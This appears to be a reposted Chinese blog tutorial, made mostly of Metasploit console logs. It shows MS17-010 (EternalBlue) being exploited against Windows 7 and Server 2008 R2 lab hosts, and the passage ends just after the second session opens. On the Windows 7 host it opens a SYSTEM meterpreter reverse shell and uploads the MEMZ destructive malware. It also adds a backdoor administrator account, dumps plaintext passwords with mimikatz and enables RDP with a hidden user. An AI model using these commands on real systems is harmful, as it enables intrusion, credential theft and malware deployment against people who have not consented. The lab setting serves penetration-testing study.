首页 > 系统相关> > 使用Kali系统对Windows7和Server2008R2进行***测试（MS17-010漏洞利用）

使用Kali系统对Windows7和Server2008R2进行***测试（MS17-010漏洞利用）

2020-03-18 15:55:41 作者：互联网

使用Kali系统对Windows7和Server 2008R2进行***测试

（MS17-010漏洞利用：上传MEMZ病毒）

1. 实验环境

测试平台：kali Linux

IP地址：192.168.8.132

Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux

靶机1：Windows 7 Professional SP1 x64

IP地址：192.168.8.133

靶机2：Windows 7 Professional SP1 x64

IP地址：192.168.8.8

扫描端口：对192.168.8.0网段进行端口扫描，发现2台目标主机打开445端口

本实验网络拓扑图:

2. 实验内容

2.1 对Windows7进行***测试

root@kali:~# msfconsole /*注释打开metasploit 注释*/

[-] ***rting the Metasploit Framework console...-

[-] * WARNING: No database support: No database YAML file

[-] ***

, ,

/ \

((__---,,,---__))

(_) O O (_)_________

\ _ / |\

o_o \ M S F | \

\ _____ | *

||| WW|||

||| |||

=[ metasploit v5.0.60-dev ]

+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post ]

+ -- --=[ 556 payloads - 45 encoders - 10 nops ]

+ -- --=[ 7 evasion ]

msf5 > search ms17-010 /*注释搜索永恒之蓝漏洞ms17-010模块注释*/

Matching Modules

================

# Name Disclosure Date Rank Check Description

- ---- --------------- ---- ----- -----------

0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection

2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization

3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options /* 显示参数 */

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

---- --------------- -------- -----------

CHECK_ARCH true no Check for architecture on vulnerable hosts

CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts

CHECK_PIPE false no Check for named pipe on vulnerable hosts

RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

RPORT 445 yes The SMB service port (TCP)

SMBDomain no The Windows domain to use for authentication

SMBPass no The password for the specified username

SMBUser no The username to authenticate as

THREADS 1 yes The number of concurrent threads (max one per host)

msf5 > use auxiliary/scanner/smb/smb_ms17_010 /* 使用漏洞扫描模块 */

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.133

rhosts => 192.168.8.133

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 192.168.8.133:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.133:445 - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf5 auxiliary(scanner/smb/smb_ms17_010) >

>use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) >

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.133

rhosts => 192.168.8.133

msf5 exploit(windows/smb/ms17_010_eternalblue) >

> set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.132

lhost => 192.168.8.132

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.8.132:4444

[+] 192.168.8.133:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.133:445 - Connecting to target for exploitation.

[+] 192.168.8.133:445 - Connection established for exploitation.

[+] 192.168.8.133:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.8.133:445 - CORE raw buffer dump (42 bytes)

[*] 192.168.8.133:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Professional 7601 Service Pack 1

[+] 192.168.8.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[+] 192.168.8.133:445 - Sending SMBv2 buffers

[+] 192.168.8.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.8.133:445 - Sending final SMBv2 buffers.

[+] 192.168.8.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] Sending stage (206403 bytes) to 192.168.8.133

[*] Meterpreter session 1 opened (192.168.8.132:4444 -> 192.168.8.133:49159) at 2020-03-17 01:09:21 -0400

[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=--=-WIN-=-=-==-=-=-=-=-=-=-=-=-

[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

meterpreter >

meterpreter > sysinfo

Computer : TODD-PC

OS : Windows 7 (6.1 Build 7601, Service Pack 1).

Architecture : x64

System Language : zh_CN

Domain : WORKGROUP

Logged On Users : 2

Meterpreter : x64/windows

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > screenshot

Screenshot saved to: /root/ZfhJyFXb.jpeg

meterpreter > lpwd

/root

meterpreter > lls

Listing Local: /root

====================

Mode Size Type Last modified Name

---- ---- ---- ------------- ----

100644/rw-r--r-- 2740 fil 2020-03-17 00:19:35 -0400 .bash_history

100644/rw-r--r-- 3391 fil 2019-11-25 07:24:30 -0500 .bashrc

40755/rwxr-xr-x 4096 dir 2020-01-17 01:40:32 -0500 .config

40755/rwxr-xr-x 4096 dir 2020-01-10 05:37:10 -0500 .msf4

100644/rw-r--r-- 148 fil 2019-11-19 04:18:26 -0500 .profile

100600/rw------- 9825 fil 2020-03-16 22:14:37 -0400 .viminfo

40755/rwxr-xr-x 4096 dir 2020-01-17 02:53:20 -0500 Desktop

40755/rwxr-xr-x 4096 dir 2019-11-25 13:44:09 -0500 Documents

40755/rwxr-xr-x 4096 dir 2019-11-25 13:44:09 -0500 Downloads

100644/rw-r--r-- 14848 fil 2016-07-09 20:59:44 -0400 memz.exe

100644/rw-r--r-- 2527232 fil 2017-09-23 12:50:28 -0400 永恒之绿.exe

meterpreter > upload memz.exe c:\\

[*] uploading : memz.exe -> c:\

[*] uploaded : memz.exe -> c:\\memz.exe

meterpreter > download c:\\haha.txt

[*] Downloading: c:\haha.txt -> haha.txt

[*] Downloaded 8.00 B of 8.00 B (100.0%): c:\haha.txt -> haha.txt

[*] download : c:\haha.txt -> haha.txt

meterpreter > shell

Process 2772 created.

Channel 1 created.

Microsoft Windows [▒汾 6.1.7601]

C:\Windows\system32>

C:\Windows\system32>chcp 65001

chcp 65001

Active code page: 65001

C:\Windows\system32>cd \

C:\>

C:\>dir

Volume in drive C has no label.

Volume Serial Number is F496-8A44

Directory of C:\

2020/03/17 13:48 8 haha.txt

2020/03/17 13:48 14,848 memz.exe

2009/07/14 11:20 <DIR> PerfLogs

2020/01/10 21:19 <DIR> Program Files

2020/01/23 14:04 <DIR> Program Files (x86)

2020/01/10 21:14 <DIR> Users

2020/01/10 21:16 <DIR> Windows

2 File(s) 14,856 bytes

5 Dir(s) 52,709,482,496 bytes free

C:\Windows\system32>net user aa 123456 /add

net user aa 123456 /add

The command completed successfully.

C:\Windows\system32>net user

net user

User accounts for \\

---------------------------------------------------------------------------

aa Administrator Guest Todd

The command completed with one or more errors.

C:\Windows\system32>net user aa

net user aa

User name aa

Full Name

Comment

User's comment

Country code 000 (System Default)

Account active Yes

Account expires Never

Password last set 2020/3/17 14:02:43

Password expires 2020/4/28 14:02:43

Password changeable 2020/3/17 14:02:43

Password required Yes

User may change password Yes

Local Group Memberships *Users

Global Group memberships *None

The command completed successfully.

C:\Windows\system32>net localgroup administrators aa /add

net localgroup administrators aa /add

The command completed successfully.

C:\Windows\system32>net user aa

User name aa

Account active Yes

Account expires Never

Password last set 2020/3/17 14:02:43

Password expires 2020/4/28 14:02:43

Password changeable 2020/3/17 14:02:43

Password required Yes

Local Group Memberships *Administrators *Users

Global Group memberships *None

The command completed successfully.

C:\Windows\system32>exit

exit

meterpreter > load mimikatz

Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (6.1 Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?

Success.

meterpreter > wdigest

[+] Running as SYSTEM

[*] Retrieving wdigest credentials

wdigest credentials

===================

AuthID Package Domain User Password

------ ------- ------ ---- --------

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;999 NTLM WORKGROUP TODD-PC$

0;2454496 NTLM Todd-PC aa 123456

0;293566 NTLM Todd-PC Todd qwert

meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop

[*] RDP is already enabled

[*] Setting Terminal Services service startup mode

[*] Terminal Services service is already set to auto

[*] Opening port in local firewall if necessary

[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317022920_default_192.168.8.133_host.windows.cle_555893.txt

或者：

meterpreter > run post/windows/manage/enable_rdp USERNAME=bb PASSWORD=password

[*] Enabling Remote Desktop

[*] RDP is disabled; enabling it ...

[*] Setting Terminal Services service startup mode

[*] The Terminal Services service is not set to auto, changing it to auto ...

[*] Opening port in local firewall if necessary

[*] Setting user account for logon

[*] Adding User: bb with Password: password

[*] Adding User: bb to local group 'Remote Desktop Users'

[*] Hiding user from Windows Login screen

[*] Adding User: bb to local group 'Administrators'

[*] You can now login with the created user

[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317022750_default_192.168.8.133_host.windows.cle_306010.txt

meterpreter >

meterpreter >exit

msf5 exploit(windows/smb/ms17_010_eternalblue) > exit

root@kali:~#

2.2 对Windows Server 2008R2进行***测试

root@kali:~# msfconsole

[-] ***rting the Metasploit Framework console.../

[-] * WARNING: No database support: No database YAML file

+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post ]

+ -- --=[ 556 payloads - 45 encoders - 10 nops ]

+ -- --=[ 7 evasion ]

msf5 >

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.8

rhosts => 192.168.8.8

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 192.168.8.8:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.8:445 - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.8

rhosts => 192.168.8.8

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.132

lhost => 192.168.8.132

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.8.132:4444

[+] 192.168.8.8:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

[*] 192.168.8.8:445 - Connecting to target for exploitation.

[+] 192.168.8.8:445 - Connection established for exploitation.

[*] 192.168.8.8:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2008 R2 Enterpris 7601 Service Pack 1

[+] 192.168.8.8:445 - Sending SMBv2 buffers

[+] 192.168.8.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.8.8:445 - Sending final SMBv2 buffers.

[+] 192.168.8.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] Sending stage (206403 bytes) to 192.168.8.8

[*] Meterpreter session 1 opened (192.168.8.132:4444 -> 192.168.8.8:49160) at 2020-03-17 03:11:44 -0400

[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-==-WIN-=-=-=--=-=-=-=-=-=-=-=-